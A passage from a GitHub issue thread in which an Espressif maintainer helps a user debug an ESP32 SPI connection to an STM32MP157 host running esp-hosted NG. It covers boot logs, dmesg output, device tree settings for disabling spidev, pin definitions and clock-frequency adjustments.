I (148) esp_image: segment 2: paddr=00030020 vaddr=42000020 size=8bcc0h (572608) map
I (247) esp_image: segment 3: paddr=000bbce8 vaddr=3fc94bf8 size=02ce4h ( 11492) load
I (249) esp_image: segment 4: paddr=000be9d4 vaddr=40380000 size=145d8h ( 83416) load
I (275) boot: Loaded app from partition at offset 0x10000
I (275) boot: Disabling RNG early entropy source...
I (286) cpu_start: Unicore app
I (286) cpu_start: Pro cpu up.
I (295) cpu_start: Pro cpu start user code
I (295) cpu_start: cpu freq: 160000000 Hz
I (295) cpu_start: Application information:
I (298) cpu_start: Project name:     network_adapter
I (304) cpu_start: App version:      release/ng-v1.0.2-262-gb1422af-
I (311) cpu_start: Compile time:     Aug 28 2024 09:34:58
I (317) cpu_start: ELF file SHA256:  783907a0e913e029...
I (323) cpu_start: ESP-IDF:          e7771c75-dirty
I (328) cpu_start: Min chip rev:     v0.3
I (333) cpu_start: Max chip rev:     v1.99 
I (338) cpu_start: Chip rev:         v0.3
I (343) heap_init: Initializing. RAM available for dynamic allocation:
I (350) heap_init: At 3FC9B950 len 000246B0 (145 KiB): DRAM
I (356) heap_init: At 3FCC0000 len 0001C710 (113 KiB): DRAM/RETENTION
I (363) heap_init: At 3FCDC710 len 00002950 (10 KiB): DRAM/RETENTION/STACK
I (371) heap_init: At 50000010 len 00001FD8 (7 KiB): RTCRAM
I (378) spi_flash: detected chip: generic
I (382) spi_flash: flash io: dio
I (386) sleep: Configure to isolate all GPIO pins in sleep state
I (392) sleep: Enable automatic switching of GPIO sleep configuration
I (399) coexist: coex firmware version: 77cd7f8
[... 540 lines cut ...]
[   17.558938] cfg80211: Loaded X.509 cert 'wens: 61c038651aabdcf94bd0ac7ff06c7248db18c600'
[   33.128185] vdda: disabling
[  310.475963] Bluetooth: Core ver 2.22
[  310.478501] NET: Registered PF_BLUETOOTH protocol family
[  310.483499] Bluetooth: HCI device and connection manager initialized
[  310.493030] Bluetooth: HCI socket layer initialized
[  310.496526] Bluetooth: L2CAP socket layer initialized
[  310.501883] Bluetooth: SCO socket layer initialized
[  416.664842] esp32_spi: loading out-of-tree module taints kernel.
[  416.891459] esp32_spi: spi_dev_init: ESP32 peripheral is registered to SPI bus [0],chip select [0]
```

</details>

Here is the modified dts: 

[stm32mp157d-stm32mp157d_dk1-mx.txt](https://github.com/user-attachments/files/16812825/stm32mp157d-stm32mp157d_dk1-mx.txt)

ESP-Commit:

[image]

Host Commit:

[image]

mantriyogesh, 2024-08-30:
Can you please test with same commit?
Two different commits, complicate the scenarios and may get undefined results.

I will anyway go through the logs.

Jmonsonis, 2024-08-30:
I already tried and it did the same.
(I tried with the Host commit 23 August).

mantriyogesh, 2024-08-30:
From the logs, I can conclude that spi lines, MISO, CLK , CS are not yet working as expected.

This is because first transaction is pushed from esp-hosted to spi slave driver queue.

Host at least should trigger first transaction, which is on MISO (INIT EVENT from slave to host).

Check if your expected pin numbers are spi pins used are correct at both places.

Also hardware connections are correct.

If still not able to get work, first worth to test 'spidev'.

In general, spidev is auto run by kernel at user/process context. It is very surprising to see that spidev is not disabled, yet you are able to claim the spi bus.

Generally if spidev is enabled or running, it would capture the bus and kernel module would fail as it cannot claim the bus.

In raspberry pi, we disable spidev using simple dts, 

https://github.com/espressif/esp-hosted/blob/master/esp_hosted_ng/host/spidev_disabler.dts

Exact same changes are not applicable but similar changes should have been done in your dts or dtsi. If not done, why the spidev was not spawned?

Is spi even enabled in your config?

mantriyogesh, 2024-09-02:
any further updates, @Jmonsonis ?

Jmonsonis, 2024-09-02:
yes, looking at this other issue ([link](https://github.com/espressif/esp-hosted/issues/262)) that uses the same boards as me, I have managed to get the spi_dev to appear in /dev when I set the status to okay, so I think I'm setting it right, but if I set the status to disabled, the interface still doesn't appear.

mantriyogesh, 2024-09-02:
Are disabling the spidev or whole spi bus itself?

Some times device tree configs may be confusing.
You need to enable spi bus, let spidev also be enabled.

Check
 ````sh
ls /dev/spidev*
```
If it results /dev/sidevX.Y

X being bus, Y being CS instance.
It may display two instances if your device has two chipselects.

For example, /dev/spidev0.0 and /dev/spidev0.1

If this is fine, just disable spidev alone (one way is to add custom dts to reference spidev blob for  and set it disabled, so that you don't alter full dtsi of board).

In above example, if you disable only /dev/spidev0.0

And run 
```bash
ls /dev/spidev*
```

Now it should output /dev/spidev0.1

As 0.0 is disabled through dts. But 0.1 would still be claimed by spidev.

In this case you can use spi bus 0, chipselect 0 in hosted to claim this unclaimed bus-cs combo.

Jmonsonis, 2024-09-02:
I am disabling only the spi_dev

[image]

When the spi_dev is enabled in /dev only appears /dev/spidev0.0.

mantriyogesh, 2024-09-02:
okay. this really means, you can use `spi bus = 0` and `cs = 0` once spidev is disabled to make it claimable at hosted kernel module.

Use same git commit of esp-hosted at esp and host, preferably latest master and please attach the textual logs of dmesg and esp from bootup.

Jmonsonis, 2024-09-02:
These are the logs.
[dmesg 1.txt](https://github.com/user-attachments/files/16836151/dmesg.1.txt)
[esp32_log 1.txt](https://github.com/user-attachments/files/16836155/esp32_log.1.txt)

mantriyogesh, 2024-09-02:
I do not see any MISO still.
1. Please check your SPI hardware connections are correct.
2. The SPI pins are correctly mapped to MISO/MOSI/CS/CLK at host driver / devide tree.

Do you happen to have any logic analyser?
CLK, CS and MISO need be verified first.

Additionally, I note the DMAs were failed to integrate with you SPI. this would result in low performance (can be dealt later).

mantriyogesh, 2024-09-04:
Do not go for such high freq, in first place. Check the [porting guide](https://github.com/espressif/esp-hosted/blob/master/esp_hosted_ng/docs/porting_guide.md) which already mentions these common issues.

Try with 5MHz first.

Jmonsonis, 2024-09-04:
It also does not work with 5Mhz.

mantriyogesh, 2024-09-04:
At least the first transaction is spotten in the log.

Can you please send picture of the setup?

mantriyogesh, 2024-09-04:
4. Can you add code from FG to your NG ESP firmware , build and flash again:

https://github.com/espressif/esp-hosted/blob/70de43ac9cc30ef55960d8025274df7a0fe1dfc8/esp_hosted_fg/esp/esp_driver/network_adapter/main/spi_slave_api.c#L637

5. I also see some runs in your logs populated but  some runs, message exchange didn't work. Is that correct?

6. Can you please comment below line :
https://github.com/espressif/esp-hosted/blob/70de43ac9cc30ef55960d8025274df7a0fe1dfc8/esp_hosted_ng/host/main.c#L325

Jmonsonis, 2024-09-05:
It doesn't work with 1Mhz either nor with the changes you recommended.

Now it seems to fail with the first byte.

Logs:

[esp32_log_1MHz.txt](https://github.com/user-attachments/files/16891185/esp32_log_1MHz.txt)
[dmesg_1Mhz 1.txt](https://github.com/user-attachments/files/16891187/dmesg_1Mhz.1.txt)

<details><summary>Spi setup</summary>

```
&spi5{
	pinctrl-names = "default", "sleep";
	pinctrl-0 = <&spi5_pins_mx>;
	pinctrl-1 = <&spi5_sleep_pins_mx>;
	status = "okay";
 
	/* USER CODE BEGIN spi5 */
	cs-gpios = <&gpiof 6 0>;
	esp32: spidev@0{
		compatible = "espressif,esp32-spi";
		reg = <0>;
		spi-max-frequency = <1000000>;
		reset-gpios = <&gpioh 11 GPIO_ACTIVE_HIGH>;
		status = "disabled";
	};
	/* USER CODE END spi5 */
};
```

</details>

<details><summary>Spi pines setup</summary>

```
#define HANDSHAKE_PIN           111
#define SPI_IRQ                 gpio_to_irq(HANDSHAKE_PIN)
#define SPI_DATA_READY_PIN      12
#define SPI_DATA_READY_IRQ      gpio_to_irq(SPI_DATA_READY_PIN)
#define SPI_BUF_SIZE            1600
```

</details>

mantriyogesh, 2024-09-05:
Mere change in the device tree may or may not work.

You may also need to comment adjust_spi_clock as above.

I don't know if you have verified all the pins : resetpin, handshake and data ready. Resetpin argument or functionality is mandatory.

I clearly see the timing is problem in between ESP and host spi.
I had asked some questions in earlier post, please refer https://github.com/espressif/esp-hosted/issues/467#issuecomment-2328876190